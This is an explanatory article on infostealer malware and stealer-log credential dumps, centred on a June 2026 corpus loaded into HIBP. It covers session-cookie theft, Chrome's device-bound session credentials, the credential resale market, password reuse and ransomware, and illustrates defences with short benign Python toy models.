Phishing in the traditional sense still feeds the pipeline, with malicious attachments and links arriving by email, though the trend has been toward lures that do not require an obvious attachment at all. The through-line is that the victim performs the install themselves, usually believing they are doing something ordinary: watching a video, fixing a glitch, getting a tool they wanted, proving they are human. That is what makes infostealers so hard to stamp out at the source. There is no exotic exploit to patch. There is a steady supply of people who will, in a moment of haste or temptation, run the wrong file.

Two facts about the victim population sharpen the picture. The first is that infection produces almost no visible symptoms. A stealer is designed to run once, grab what it can, exfiltrate it, and often delete itself, all within seconds or minutes. There is no ransom note, no slowdown, no obvious sign. Most victims never learn they were hit until their credentials surface in a dataset like the June 2026 corpus, sometimes years later. The second is that having security software installed is not the protection people assume it to be. Research into compromised devices found that a large majority of malware infections happened on machines that had antivirus or endpoint protection running, because evasion is a core feature of the malware and because the user willingly executing the payload bypasses many defences.

The geography of infection is also broader than the corporate-versus-personal split implies, which is why the credentials in these logs reach into workplaces as readily as homes. A person who uses one laptop for personal browsing and occasional work, with both sets of credentials saved in the same browser, hands an attacker both in a single log. The boundary between “my device” and “my employer’s exposure” runs straight through that shared browser profile, and the malware does not respect it.

The practical lesson is unglamorous but reliable. The behaviours that prevent stealer infections are the ones people already know and skip: do not run cracked software, do not paste commands you do not understand into system dialogs, do not trust update prompts that appear from nowhere, and treat unexpected “verify yourself” steps with suspicion. None of that requires technical sophistication. It requires resisting the specific moments of convenience and curiosity that the lures are built to exploit, which is harder than it sounds precisely because the malware authors have spent years refining those moments.

Browsers turned into the softest target

The browser is where modern infostealers do most of their work, and that is not an accident. Over the past decade, the browser has quietly become the place where people keep the keys to their entire digital life. Saved passwords, autofilled addresses and payment cards, active login sessions for email and banking and work tools, browsing history, and increasingly the credentials for cloud consoles and developer platforms all live inside the browser profile. A tool that can read a browser profile can read most of what matters about a person, which is exactly why stealers are built to target browser data first.

The convenience that makes this possible is the convenience users were encouraged to adopt. Browsers offered to remember passwords, and people accepted, because typing a unique strong password on every login is impractical and the browser made it painless. The trade-off, rarely spelled out, is that saved credentials have to be stored in a form the browser can retrieve and use, which means they have to be decryptable on the device. On Windows, browser password stores were historically protected by the operating system’s data-protection mechanisms tied to the user account, which sounds secure but means that any program running as that user, including malware the user has just executed, can decrypt the saved passwords. The protection guards against another user on the same machine, not against code running in the victim’s own session.

Google moved to close part of this gap. In July 2024, Chrome introduced application-bound encryption on Windows, designed to tie the encryption of sensitive data such as cookies to the Chrome application itself, so that an arbitrary program running as the user could no longer simply read it. The effect was immediate but temporary. Several stealer families paused their distribution while they worked out how to defeat the new protection, and within months they had bypassed it, with maintainers of multiple families claiming and then demonstrating the ability to exfiltrate cookies from the newest Chrome versions; researchers independently confirmed a working bypass in at least one open-source stealer. The cat-and-mouse pattern is the norm: a defence raises the cost, the market adapts, and the data keeps flowing.

The breadth of what gets taken from the browser is what makes a single infection so damaging. It is not just passwords. The malware harvests the cookies that represent active sessions, the autofill store with names and addresses and sometimes card details, and the saved credentials for every site the victim ever told the browser to remember. Because the browser pairs each saved credential with its site, the resulting log is pre-indexed by service, which is why these logs are so much more useful than undifferentiated dumps. The attacker does not receive a pile of passwords; they receive a directory of which password opens which door.

This concentration of value in the browser also reshapes the advice that follows. The habit of letting the browser remember everything, including high-stakes logins for banking, email and work, is the habit that turns a brief infection into a total compromise. The safer pattern separates the credential store from the browser entirely, keeping passwords in a dedicated manager that does not expose the whole vault to any program running in the user’s session, and reserving the browser’s own password memory for low-stakes accounts where the consequences of exposure are minor. That separation does not make infection impossible, but it changes what a stealer can grab in the seconds it runs.

The deeper issue is architectural, and it points toward the later sections of this analysis. As long as authentication depends on a secret that must be stored on the device in a usable form, a tool that controls the device can steal that secret. Browser hardening like application-bound encryption raises the bar, and device-bound session protections raise it further, but they are mitigations layered onto a model whose core assumption, that a stored, replayable secret is a safe way to prove identity, is exactly what infostealers exploit. The browser is the softest target because it is where the replayable secrets pile up, and the long-term fix is to stop relying on replayable secrets at all.

Stolen session cookies and the quiet defeat of two-factor authentication

The most underrated part of a stealer log is not the passwords; it is the cookies. To see why, it helps to understand what a session cookie does. When you log in to a website and clear any second-factor check, the site hands your browser a token that says, in effect, “this person already proved who they are, let them through without asking again.” That token, the session cookie, is what keeps you logged in as you move around the site and across visits. It exists precisely so you do not have to re-authenticate constantly. It is a portable proof of an authenticated session, and if someone else holds it, the site treats them as you.

This is the mechanism that lets stealers walk straight past two-factor authentication. Multi-factor authentication protects the act of logging in. It makes the initial authentication harder by requiring something beyond the password: a code, a prompt, a key. But the session cookie is issued after all of that is done. An attacker who steals a live session cookie does not need the password and does not face the second factor, because the cookie represents a session that has already cleared both. They import the cookie into their own browser, and the site, seeing a valid session token, grants access with no prompt and no challenge. The careful second factor the victim set up never enters the picture.
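A toy model makes the ordering concrete. The class below is a hypothetical site invented for illustration (the name `ToySite`, the fixed one-time code and the plaintext password are all simplifying assumptions, not how a real service should store anything). What matters is that `whoami` consults only the cookie, so whoever presents the cookie is treated as the user.

```python
import secrets


class ToySite:
    """Hypothetical site: password plus one-time code at login, cookie afterwards."""

    def __init__(self):
        # Toy data only; a real service would never store secrets like this.
        self.users = {"alice": {"password": "correct horse", "otp": "492817"}}
        self.sessions = {}  # session cookie -> username

    def login(self, username, password, otp):
        user = self.users.get(username)
        if user is None or user["password"] != password or user["otp"] != otp:
            return None
        cookie = secrets.token_urlsafe(32)
        self.sessions[cookie] = username
        return cookie

    def whoami(self, cookie):
        # Neither the password nor the second factor is checked here:
        # the cookie alone decides who the caller is.
        return self.sessions.get(cookie)


site = ToySite()
victim_cookie = site.login("alice", "correct horse", "492817")

# A stealer copies the cookie value; the attacker presents it from elsewhere.
stolen_cookie = victim_cookie
print(site.whoami(stolen_cookie))  # prints "alice"
```

The attacker never calls `login`, which is the only place the second factor is enforced.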

This technique has become the dominant route around MFA, and the scale is substantial. Analysis of tens of millions of stealer packages in 2025 found a sharp year-on-year rise in volume and confirmed that these packages are dangerous specifically because they carry live session cookies capable of bypassing MFA entirely; the vast majority also contained active passwords and recorded the exact sites where they were used. Older infections harvested large numbers of cookies per device, with averages well into the thousands, each one a potential foothold into an account that the victim believed a second factor had locked down. Business email compromise, cloud-account takeover and a long list of high-profile intrusions have run on stolen session cookies rather than stolen passwords.

The reason this matters so much for the June 2026 dataset is that it changes what a password change can accomplish. If your address is in the corpus, the standard advice is to change the exposed passwords, and that advice is correct as far as it goes. But if the same infection also captured your session cookies, those cookies may still be valid, and rotating the password does not necessarily invalidate them. An attacker holding a live cookie can remain inside an authenticated session even after you change the password, until the session naturally expires or you explicitly sign out of all sessions and force a global token reset. This is why proper remediation after a stealer infection includes invalidating active sessions, not just changing credentials, a step most people never take and most consumer services bury deep in their settings.
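The gap between changing a password and ending a session can be sketched the same way. The service below is hypothetical and assumes the weaker behaviour described above, where a password change leaves existing sessions untouched; many real services do revoke sessions on a password change, so treat this as a model of the failure case rather than of any particular provider.

```python
import secrets


class ToyAccountService:
    def __init__(self):
        self.passwords = {}  # username -> password (plaintext only in this toy)
        self.sessions = {}   # session token -> username

    def register(self, user, password):
        self.passwords[user] = password

    def login(self, user, password):
        if self.passwords.get(user) != password:
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user
        return token

    def change_password(self, user, new_password):
        # Assumption: existing sessions are NOT revoked here.
        self.passwords[user] = new_password

    def sign_out_everywhere(self, user):
        # Drop every session that belongs to this user.
        self.sessions = {t: u for t, u in self.sessions.items() if u != user}

    def session_valid(self, token):
        return token in self.sessions


service = ToyAccountService()
service.register("alice", "old-password")
stolen_token = service.login("alice", "old-password")  # later copied by a stealer

service.change_password("alice", "new-password")
print(service.session_valid(stolen_token))  # True: the stolen session survives

service.sign_out_everywhere("alice")
print(service.session_valid(stolen_token))  # False: only revocation ends it
```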

The corporate dimension is sharper still. The Verizon analysis is explicit that post-infection remediation has to include invalidating active session cookies, not merely resetting stolen credentials, if an organisation wants to actually stop an attacker who has exfiltrated session data. A help desk that resets a compromised user’s password and considers the matter closed may have done nothing about the cookie that is still letting the intruder act as that user. Treating cookie theft as a footnote to password theft is one of the most common and most costly mistakes in incident response.

There is a hard limit to how much the individual can do about this, which is part of why the problem persists. Most consumer services do not surface session management clearly, do not show you which devices and sessions are currently active, and do not make it easy to revoke them. The defences that genuinely blunt cookie theft are mostly server-side or platform-side: shorter session lifetimes, binding sessions to a device, and re-authentication for sensitive actions. The user’s only recourse is the blunt instrument of signing out everywhere and the preventive work of not getting infected in the first place. That asymmetry, where the most dangerous artefact in the log is also the one the victim can do least about, is exactly why the industry has started building technical answers into the browser itself.
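Two of those server-side defences, shorter session lifetimes and re-authentication for sensitive actions, reduce to a pair of time checks. The sketch below is illustrative only: the 15-minute and 5-minute limits and all names are assumptions chosen for the example, and timestamps are passed in explicitly so the behaviour is easy to follow.

```python
from dataclasses import dataclass

SESSION_TTL = 15 * 60    # assumed: a session lives for 15 minutes
REAUTH_WINDOW = 5 * 60   # assumed: sensitive actions need proof within 5 minutes


@dataclass
class Session:
    user: str
    issued_at: float     # seconds: when the session was created
    last_auth_at: float  # seconds: when the user last proved their identity


def session_is_live(session, now):
    return now - session.issued_at < SESSION_TTL


def may_perform_sensitive_action(session, now):
    recently_authenticated = now - session.last_auth_at < REAUTH_WINDOW
    return session_is_live(session, now) and recently_authenticated


s = Session(user="alice", issued_at=0.0, last_auth_at=0.0)
print(session_is_live(s, now=600.0))               # True: 10 minutes in
print(may_perform_sensitive_action(s, now=600.0))  # False: must re-authenticate
print(session_is_live(s, now=1000.0))              # False: past the 15-minute limit
```

A stolen cookie still works inside these windows, but the windows bound how long it works and what it can do without a fresh proof of identity.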

Google’s device-bound answer and where it stops

The clearest attempt to neutralise cookie theft at a structural level arrived in April 2026, when Google made Device Bound Session Credentials, or DBSC, generally available to Windows users in Chrome 146. The idea is straightforward and aimed precisely at the weakness described above. Instead of issuing a session cookie that works anywhere it is presented, DBSC cryptographically binds the session to the specific device that created it, using hardware-backed security: the Trusted Platform Module on Windows, with the Secure Enclave as the intended equivalent on macOS. The keys that prove the binding are generated by the security chip and cannot be exported from the machine.

The consequence is that a stolen cookie stops being useful on a different computer. If a stealer copies a DBSC-protected session and an attacker imports it into their own browser, the site can verify that the session is not running on the device it was bound to, and refuse it. The cookie becomes dead weight the moment it leaves the machine. Google reported that an earlier rollout in 2025 produced a marked reduction in session theft for protected sessions, and internal testing of the mechanism blocked the large majority of attempted cookie-theft scenarios. For the single most dangerous element of a stealer log, this is a genuine and well-aimed countermeasure.
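The principle behind device binding is proof of possession: the server asks the device to answer a fresh challenge with a key that never leaves it. The sketch below is not the DBSC protocol. In particular, the real mechanism relies on a key pair whose private half stays inside the security chip, whereas this example substitutes an HMAC over a device-held secret purely because that is available in the Python standard library. All class and method names are hypothetical.

```python
import hashlib
import hmac
import secrets


class Device:
    """Stands in for a machine whose security chip holds a non-exportable key."""

    def __init__(self):
        self._key = secrets.token_bytes(32)

    def enrol_with(self, server, session_id):
        # SIMPLIFICATION: with HMAC the server must hold the same secret.
        # A real design registers only a public key.
        server.bind(session_id, self._key)

    def prove(self, challenge):
        return hmac.new(self._key, challenge, hashlib.sha256).digest()


class Server:
    def __init__(self):
        self._bound = {}  # session id -> key material registered at login

    def bind(self, session_id, key):
        self._bound[session_id] = key

    def new_challenge(self):
        return secrets.token_bytes(16)

    def verify(self, session_id, challenge, proof):
        key = self._bound.get(session_id)
        if key is None:
            return False
        expected = hmac.new(key, challenge, hashlib.sha256).digest()
        return hmac.compare_digest(expected, proof)


server = Server()
victim_device = Device()
attacker_device = Device()  # holds the stolen session id, but not the key

victim_device.enrol_with(server, "session-1")
challenge = server.new_challenge()

print(server.verify("session-1", challenge, victim_device.prove(challenge)))    # True
print(server.verify("session-1", challenge, attacker_device.prove(challenge)))  # False
```

Copying the session identifier is no longer enough, because the attacker's machine cannot answer the challenge.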

The limits, though, are important, and Google has been reasonably clear about them. DBSC protects sessions. It does nothing for the passwords, the autofill data, the SSH keys, the cloud tokens or any of the other contents of a stealer log. A log stripped of usable cookies still hands the attacker a directory of plaintext credentials and the sites they unlock, which feeds credential stuffing and account takeover through the front door. The protection addresses the cookie-replay vector and leaves the rest of the harvest untouched.

The coverage is also partial in ways that matter for real-world impact. At launch, DBSC was a Windows-only feature in Chrome, with macOS support promised for a later release whose date had not yet been announced. It only works when the website implements the standard on its own servers, so a session is protected only if both the browser and the site support it. Google’s own services adopted it early, and major providers such as Microsoft are expected to follow, but coverage across the long tail of the web is far from universal and will take years to fill in. A user can be running a DBSC-capable browser and still hold ordinary, stealable cookies for every site that has not implemented the standard.

The most fundamental limit is one of timing. DBSC is prospective. It does nothing about credentials and cookies already in circulation, including everything in the June 2026 corpus and the vast stream of stealer output behind it. The infostealer market does not operate on a forward-looking basis; the logs already traded, already loaded, already being used for account takeover, are unaffected by a protection that changes how future sessions behave. For the data already out there, the only remedies remain the unglamorous ones: change exposed passwords, invalidate active sessions where you can, and remove the malware.

DBSC is best understood as part of a broader move to make stored secrets less replayable, alongside passkeys and short-lived tokens, rather than as a fix for the current dataset. It raises the cost of cookie theft and, over time and with broad adoption, could blunt one of the most effective MFA-bypass techniques in use. But it is a defence for the next infection, not a cleanup for the last one, and the contents of the June 2026 logs sit firmly on the wrong side of that line.

The economics of a single stolen login

A stolen credential is worth something only because there is a market that prices it, and the structure of that market explains why the June 2026 corpus exists at all. Once a stealer log lands with its operator, it enters a trade with surprisingly low unit prices and surprisingly high turnover. Individual logs change hands cheaply, often around the cost of a coffee on the busier marketplaces, because supply is enormous and a single log’s value depends entirely on what it contains. A log with a live banking session or a corporate VPN credential is worth far more than one with only a streaming-service password, and the market sorts accordingly.

The trade runs through a few well-worn venues. Telegram is the dominant channel, hosting both public channels that advertise and dump logs and private paid groups where clients get searchable access to fresh material. Dedicated marketplaces operate alongside it, letting buyers search by country, by site, or by the presence of specific high-value credentials, and pricing logs as discrete products. The now-defunct Genesis Market pioneered selling not just credentials but also the browser fingerprints and cookies needed to impersonate the victim’s session convincingly; its takedown removed one venue, and others absorbed the demand. The pattern, again, is that disrupting a single marketplace dents the trade without ending it.

The buyers are not a monolith, and the most important category for the downstream damage is the initial access broker. These are specialists who acquire credentials in bulk, validate which ones still work, and resell verified access to other criminals, most consequentially to ransomware crews. A broker turns a raw stealer log into a tested product: not “here are some passwords that might work,” but “here is confirmed access to this organisation’s environment.” That validation step is what links the cheap, high-volume world of stealer logs to the expensive, targeted world of corporate extortion. A login that cost a few dollars as part of a log can become the entry point for a seven-figure ransomware incident.

This is why the volume in datasets like the June 2026 corpus translates into real harm rather than abstract risk. The logs are raw material. The brokers refine them. The end users monetise them through fraud, account takeover, extortion or resale. Each step adds value and extends the life of the original theft, which is why a credential stolen months ago can still be doing damage today. The commodity does not perish quickly, and as long as the underlying password works somewhere, the log retains value through every hand it passes.

The aggregation dynamic compounds the economics. Because logs are copied, merged and recirculated, the same credential can appear in many products, sold many times to many buyers. A single password reuse by a single victim can therefore generate income for multiple criminals across multiple transactions, none of whom did the original stealing. The threat-intelligence researchers who eventually hand a cleaned corpus to HIBP are scraping the public and semi-public end of this churn, which is why the data they collect is so heavily duplicated and why deduplication is the essential first step before any honest count.
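Deduplication of this kind is simple to sketch. The example below is a minimal illustration under stated assumptions: email addresses are compared case-insensitively and with surrounding whitespace removed, passwords are compared exactly, and the sample records are invented. It is not a description of how HIBP or its contributors actually process data.

```python
def normalise(email, password):
    # Assumption: addresses compare case-insensitively; passwords do not.
    return email.strip().lower(), password


def deduplicate(records):
    """Return unique (email, password) pairs in first-seen order."""
    seen = set()
    unique = []
    for email, password in records:
        key = normalise(email, password)
        if key not in seen:
            seen.add(key)
            unique.append(key)
    return unique


raw = [
    ("Alice@example.com", "hunter2"),
    ("alice@example.com", "hunter2"),   # same pair, resold in another log
    ("alice@example.com ", "hunter2"),  # same pair with stray whitespace
    ("bob@example.com", "hunter2"),
    ("alice@example.com", "Hunter2"),   # different password, so a new pair
]

unique_pairs = deduplicate(raw)
unique_emails = {email for email, _ in unique_pairs}
unique_passwords = {password for _, password in unique_pairs}

print(len(raw), len(unique_pairs), len(unique_emails), len(unique_passwords))
# prints: 5 3 2 2
```

The same arithmetic explains why a headline count of unique addresses and unique passwords is far smaller than the number of raw records behind it.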

There is a grimly efficient logic to all of this from the attacker’s side, and naming it helps clarify the defence. Infostealers offer the best return on investment in the cybercrime market, because the input cost is low, the malware is bought rather than built, the harvest is automated, and the output is a reusable, resellable asset with a long shelf life. Compared with the effort of ransomware negotiation or the slim margins of cryptojacking, harvesting and selling credentials is close to passive income. That economic gravity is what keeps pulling new suppliers, new traffers and new buyers into the market, and it is why supply-side enforcement alone cannot win.

The defensive implication follows directly from the economics. The value of a stolen credential collapses if it does not work anywhere it is tried. A unique password that has been changed is worthless to a buyer. A session bound to a device cannot be replayed. A passkey cannot be harvested as a reusable secret at all. The market is efficient at extracting value from replayable secrets, so the durable defence is to stop providing replayable secrets, which removes the product the market is built to sell. Everything in the practical sections that follow is, at bottom, an effort to make the harvested credential worth nothing.

Credential reuse turns one password into many break-ins

The single behaviour that converts a stealer log from a contained problem into a sprawling one is password reuse, and the data on how common it is should end any debate about whether it matters. When Verizon’s analysts examined the credentials saved on devices infected by infostealers, they found that in the median case only about half of a given user’s passwords were distinct from one another. The rest were reused across services. For the typical victim, one stolen password is not one compromised account; it is a master key that opens a meaningful fraction of their digital life.
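The statistic is easier to interpret with the calculation spelled out. The sketch below is one plausible reading of the measure, not Verizon's documented methodology: for each device, take the share of saved passwords that are distinct, then take the median across devices. The device data is invented for illustration.

```python
from statistics import median


def distinct_share(passwords):
    """Fraction of a device's saved passwords that are distinct (list must be non-empty)."""
    return len(set(passwords)) / len(passwords)


# Invented sample: saved passwords per infected device.
devices = {
    "device-a": ["p1", "p1", "p2", "p1"],     # 2 distinct of 4 -> 0.5
    "device-b": ["x", "y", "z"],              # 3 distinct of 3 -> 1.0
    "device-c": ["q", "q", "q", "q", "r"],    # 2 distinct of 5 -> 0.4
}

shares = [distinct_share(passwords) for passwords in devices.values()]
print(median(shares))  # prints 0.5
```

A median of about one half means the typical victim protects many accounts with a much smaller set of passwords.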

This is the mechanism behind credential stuffing, the automated attack that the June 2026 corpus directly enables. The technique is simple and brutally effective. An attacker takes a stolen email-and-password pair and tries it, automatically, across a wide list of services: email providers, banks, retailers, social platforms, workplace tools. Because so many people reuse passwords, a stolen credential that worked at one site has a good chance of working at others. The attacker is not guessing or cracking anything; they are betting on reuse, and the bet pays off often enough to be worth running at industrial scale. With a corpus of tens of millions of credentials, the hit rate does not need to be high for the absolute number of compromised accounts to be large.
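The point about low hit rates is plain arithmetic. The figures below are hypothetical: the hit rates are assumptions chosen only to show the scale, not measured success rates, and the calculation assumes one tested pair per address in the 56.3 million reported for this corpus.

```python
ADDRESSES = 56_300_000  # unique email addresses reported for the corpus


def expected_hits(pairs, hits_per_10k):
    """Accounts compromised if hits_per_10k of every 10,000 tested pairs succeed."""
    return pairs * hits_per_10k // 10_000


# Assumed, illustrative hit rates: 0.1%, 0.5% and 2%.
for hits_per_10k in (10, 50, 200):
    rate = hits_per_10k / 100
    print(f"{rate}% -> {expected_hits(ADDRESSES, hits_per_10k):,} accounts")
# prints:
# 0.1% -> 56,300 accounts
# 0.5% -> 281,500 accounts
# 2.0% -> 1,126,000 accounts
```

Even the smallest assumed rate yields tens of thousands of working logins from a single pass over the data.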

Credential stuffing is also designed to be hard to detect, which is part of why it remains so successful. Each stolen credential is typically tried only once against a given account, so the attempts blend into normal login traffic and rarely trigger the rate-limiting or lockout protections built to catch repeated failed logins from one source. Verizon’s examination of single sign-on provider logs found that credential stuffing accounted for roughly a fifth of all authentication attempts on a median daily basis, a startling figure that means a substantial share of the login traffic hitting major identity providers is criminals quietly testing stolen pairs.
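A per-account lockout counter shows why this traffic slips through. The sketch below assumes a common but simplified rule, locking an account after five failed logins, and uses invented addresses and usernames. It compares a brute-force burst against one account with a stuffing run that tries each account once.

```python
from collections import Counter

LOCKOUT_THRESHOLD = 5  # assumed: lock an account after 5 failed logins


def locked_accounts(failed_attempts):
    """failed_attempts: list of (source_ip, username) pairs for failed logins."""
    per_account = Counter(username for _, username in failed_attempts)
    return {user for user, count in per_account.items() if count >= LOCKOUT_THRESHOLD}


# Brute force: one source hammers one account.
brute_force = [("203.0.113.7", "alice")] * 6

# Credential stuffing: one attempt per account, from rotating sources.
stuffing = [(f"198.51.100.{i}", f"user{i}") for i in range(6)]

print(locked_accounts(brute_force))  # {'alice'}
print(locked_accounts(stuffing))     # set(): nothing trips the counter
```

Both runs produce six failures, but only the first concentrates them where the lockout rule is looking.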

The stealer-log format makes this attack more efficient than older combo lists ever could, and this is worth dwelling on. A combo list gives an attacker email-and-password pairs with no context. A stealer log gives them the pair plus the exact site where it was used. That turns a blind spraying attack into a targeted one: the attacker can go straight to the service where the credential is known to work, and then test the same password at the high-value services where reuse would be most damaging. The pre-indexing by site, again, is what makes stealer logs the premium product in the credential-theft market.

The chain of harm from reuse has produced some of the most consequential breaches of recent years. Major incidents at companies including ride-hailing and consumer-genetics firms were enabled not by sophisticated intrusions but by reused or stolen credentials feeding credential-stuffing and account-takeover attacks. The pattern in the Snowflake-related intrusions of 2024 was similar: a large share of the compromised accounts had prior credential exposure, plausibly collected by infostealers, and the attackers simply used credentials that worked because a second factor was not enforced. The common thread is not clever hacking. It is a reused password meeting a service that trusted the password alone.

The fix is conceptually trivial and behaviourally hard, which is the whole problem. A unique password for every service means a single stolen credential compromises exactly one account, and credential stuffing collapses because there is nothing to reuse. The reason this advice has been repeated for two decades without being followed is that unique passwords are impossible to remember at the scale of modern digital life. That is precisely the gap a password manager fills, and it is why the later practical guidance treats unique passwords and a manager as a single, inseparable recommendation rather than two separate tips. Reuse is the lever that multiplies the damage; removing reuse removes the multiplier.
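What a password manager does at its core is small enough to sketch: generate an independent random password for each site and remember it so the user does not have to. The example below uses Python's `secrets` module; the length of 20, the character set and the site names are illustrative assumptions, and a real manager also encrypts the vault, which is omitted here.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_password(length=20):
    """Return a random password drawn from a cryptographically secure source."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


# One independent password per site (hypothetical site names).
sites = ["mail.example", "bank.example", "shop.example"]
vault = {site: generate_password() for site in sites}

for site, password in vault.items():
    print(site, len(password))
```

Because each entry is generated independently, a password stolen from one site reveals nothing about the others.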

The ransomware pipeline that begins with one log

The connection most people miss is the one between a stolen browser password and a crippled hospital or factory. Stealer logs are not only a fraud problem; they are the front end of the ransomware supply chain, and the data tying the two together is now hard to dismiss. When researchers correlated infostealer logs and marketplace postings against the organisations that ransomware groups publicly named as victims, they found that more than half of those ransomware victims had appeared in the credential dumps beforehand, with their domains showing up as sites the stolen credentials were used against. The same pattern held across both 2024 and 2025: a majority of ransomware victims were sitting in stealer-log marketplaces before the attack landed.

The pipeline runs in stages, each handled by a different specialist. A traffer spreads the malware. The stealer harvests an employee’s device, including any corporate credentials saved in the browser. An initial access broker buys the log, validates that the corporate credentials still work, and sells confirmed access to a ransomware affiliate. The affiliate uses that access to get inside the network, move laterally, escalate privileges, and eventually deploy the ransomware. A single infected laptop, belonging to one employee who saved a work login in a personal browser, can be the first link in a chain that ends with an entire organisation encrypted.

The speed of this chain has compressed in a way that should worry defenders. Verizon’s analysis of the gap between a credential appearing in a stealer log and a ransomware incident found the timing alarmingly short, with a common interval measured in a small number of days. If a credential surfaces in a marketplace at the start of the week, the organisation it unlocks can be facing ransomware before the week is out. The window between exposure and exploitation is too short to rely on slow, manual detection, which is why monitoring for exposed credentials in near real time has become a serious part of enterprise defence rather than a nice-to-have.

The macro numbers frame the stakes. Ransomware appeared in 44% of breaches in the most recent Verizon dataset, up sharply from the prior year, even as the median ransom payment fell and a growing majority of victims refused to pay. The decline in payments is encouraging and reflects better preparedness and negotiation, but the rising prevalence shows the volume of attacks is not slowing. As long as stolen credentials keep flowing out of infected endpoints, ransomware crews have a cheap, reliable way in, and the stealer-log market is the wholesaler keeping them supplied.

What makes this especially difficult is the boundary problem described earlier. The credentials that lead to ransomware are frequently harvested from devices the organisation does not manage. Verizon’s infostealer analysis found that while a notable share of compromised systems carrying corporate logins were enterprise-licensed, a larger share of the systems holding corporate credentials were unmanaged, most likely personal or bring-your-own devices being used for work, hosting personal and business credentials side by side. The corporate credential was stolen from a machine the company never controlled, which means traditional endpoint defences on managed assets did nothing to prevent it.

For organisations, the implication is that ransomware defence and infostealer defence are the same project. Hardening the perimeter and backing up data matter, but if a valid corporate credential is for sale in a marketplace, the attacker does not need to break the perimeter; they log in. Defending against ransomware therefore starts upstream, at the credential: enforcing phishing-resistant authentication so a stolen password is not enough, monitoring for the organisation’s domains appearing in stealer logs, and being able to force credential and session resets quickly when they do. The June 2026 corpus is not only a list of individuals at risk of fraud. Buried in those 56 million addresses are the corporate logins that some ransomware affiliate may already be validating.
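Monitoring for an organisation's domains is, at its simplest, a matching problem over the site and username recorded in each log entry. The sketch below is a minimal illustration: the record shape of (URL, username), the monitored domain `corp.example` and the function names are all assumptions, and real monitoring services work from far messier data.

```python
from urllib.parse import urlsplit

MONITORED_DOMAINS = {"corp.example"}  # hypothetical organisation domain


def host_matches(host, domain):
    # Match the domain itself or any subdomain, but not lookalikes.
    return host == domain or host.endswith("." + domain)


def exposed_records(records, monitored=MONITORED_DOMAINS):
    """Return records whose login site or email domain belongs to a monitored domain."""
    hits = []
    for url, username in records:
        host = (urlsplit(url).hostname or "").lower()
        email_domain = username.rpartition("@")[2].lower() if "@" in username else ""
        if any(host_matches(host, d) or host_matches(email_domain, d) for d in monitored):
            hits.append((url, username))
    return hits


records = [
    ("https://vpn.corp.example/login", "jsmith"),
    ("https://mail.example.net/", "j.smith@corp.example"),
    ("https://notcorp.example/login", "someone@elsewhere.example"),
    ("https://shop.example.org/", "jsmith99"),
]

for hit in exposed_records(records):
    print(hit)
```

The first two records are flagged, one by login site and one by email domain; each hit is a prompt to reset the credential and revoke that user's sessions.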

Verizon’s evidence on who is really getting infected

The annual Verizon Data Breach Investigations Report has become the most-cited source on how breaches actually happen, and its 2025 edition is unusually direct about the role of infostealers. Built on more than 22,000 security incidents and over 12,000 confirmed breaches across 139 countries, it is the largest dataset in the report’s eighteen-year history, which gives its findings weight beyond any single vendor’s marketing. Its conclusions on credentials cut straight to the heart of what the June 2026 corpus represents.

The headline finding is that stolen credentials remained the most common way attackers gained initial access, used in 22% of breaches, holding the top spot for a second consecutive year. Phishing accounted for 16% and vulnerability exploitation for 20%, the last of these growing fast, but credential abuse stayed on top. The dominance is even starker in specific patterns: 88% of basic web-application attacks involved stolen credentials. The human element, encompassing errors, social engineering and misuse, featured in 60% of breaches. The picture the report paints is of attackers consistently choosing the path of least resistance, and that path is a working credential.

The infostealer-specific analysis is where the report speaks most directly to stealer logs. Examining the credential logs produced by this malware, Verizon’s team found that 30% of the compromised systems could be identified as enterprise-licensed devices, meaning corporate-managed machines were well represented in the harvest. More striking, of the compromised systems that held corporate login data, 46% were non-managed devices, most plausibly personal or bring-your-own machines hosting both personal and business credentials. The report’s dry conclusion was that an organisation which does not consciously choose and enforce a policy on which devices can reach corporate systems may find the policy chosen for it, with results it will not like.

The reuse data from the same report, already noted, explains why this is so dangerous: in the median case, only around half of an infected user’s passwords were distinct from one another. Combined with the finding that credential stuffing made up roughly a fifth of authentication attempts to single sign-on providers on a typical day, the report describes an environment in which stolen, reused credentials are not an edge case but a constant background hum of the internet’s login traffic. The attacks are quiet, continuous and largely automated, which is exactly why they evade the defences tuned for noisier intrusions.

There is a sobering footnote about the limits of existing protections. The report and adjacent research found that a large majority of malware infections occurred on devices that had antivirus or endpoint security installed, and that conventional multi-factor authentication is increasingly being bypassed through prompt bombing, token theft and the session-cookie technique described earlier. Having security tools and having MFA are necessary but no longer sufficient, because the malware evades the tools and the cookie theft sidesteps the second factor. The report’s recommended mindset shifted accordingly, from “assume you will be breached” to a more constructive “assume access, ready defences,” meaning assume some credentials are already compromised and build login-time controls that contain the damage.

For a reader trying to place the June 2026 dataset in context, the Verizon evidence does two things. It confirms that the corpus is not an anomaly but a sample of the single most important attack vector on the internet, and it dismantles the comforting belief that corporate and personal exposure are separate. The blurring of work and personal credentials on unmanaged devices is not a fringe risk; by Verizon’s count it is where a large share of corporate credential theft now originates. The infected personal laptop is the soft underbelly of enterprise security, and the stealer logs are the proof.

Stealer logs behave like a firehose, not a discrete breach

One of the more useful observations Troy Hunt has made while loading these datasets is that the very concept of a “breach” fits stealer logs badly. A classic breach is a discrete event with a clear before and after. A specific company was secure on Monday and compromised on Tuesday; a defined database was copied; the affected population is the set of people who had accounts there. Ashley Madison, Dropbox and the hundreds of other named entries in HIBP work this way. Stealer logs do not. They are not an event; they are a continuous flow, a firehose of credentials being harvested from new victims every day, then merged, repackaged and recirculated without end.

This changes how any single dataset should be understood. The June 2026 corpus is not “the moment 56 million people were compromised.” It is a snapshot, a scoop taken from an ongoing stream, deduplicated and frozen at the point of loading. The same victims may appear in earlier and later scoops. The same credentials flow through countless channels simultaneously. Treating a stealer-log load as a single incident with a single date imposes a structure on the data that does not match how the data is actually produced, which is one reason the loads can feel both alarming and strangely indeterminate: there is no clean victim organisation, no precise breach date, and no defined population.

Hunt has described the practical consequence in his own work. When his team checks a new corpus against the existing HIBP data, the crossover is routinely very high, frequently in the high eighties or low nineties as a percentage, and most of the previously-seen material traces back to earlier stealer-log loads rather than to conventional breaches. For the Synthient stealer corpus, a sample of around 94,000 addresses showed roughly 92% had been seen before, mostly in a prior large stealer load. That high recirculation is the signature of a firehose. The water keeps coming, but a lot of it is the same water that has already passed through.
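
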